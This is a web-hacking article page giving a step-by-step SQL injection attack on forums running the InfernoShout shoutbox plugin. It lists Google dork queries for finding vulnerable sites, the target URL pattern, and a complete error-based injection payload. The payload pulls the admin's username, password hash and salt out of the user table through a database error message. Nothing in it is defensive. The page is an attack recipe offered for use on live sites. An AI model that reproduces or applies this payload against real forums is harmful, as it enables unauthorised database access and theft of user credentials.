Main » Articles » Web Hacking » Exploits and Vulenrablities |
Hello All , STEP 1)FINDING THE Vulnerable Forums Using Google DORKS. INURL: infernoshout.php OR inurl: infernoshout.php?do=options&area=commands
STEP 3) Goo Here : http://site.com/infernoshout.php?do=options&area=commands
COMMAND INPUT : ’ and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ”=’# COMMAND OUTPUT :type anything there It doesnt really matter . STEP 5) DATABASE ERROR :When you hit Save it will generate a DATABASE error and Press Control+ U you will get the source
such as USERNAME:HASH:SALT Here is a special Video of Live executing the exploit | |
Views: 6380 | Comments: 4 | Rating: 5.0/1 |
Total comments: 4 | ||||
| ||||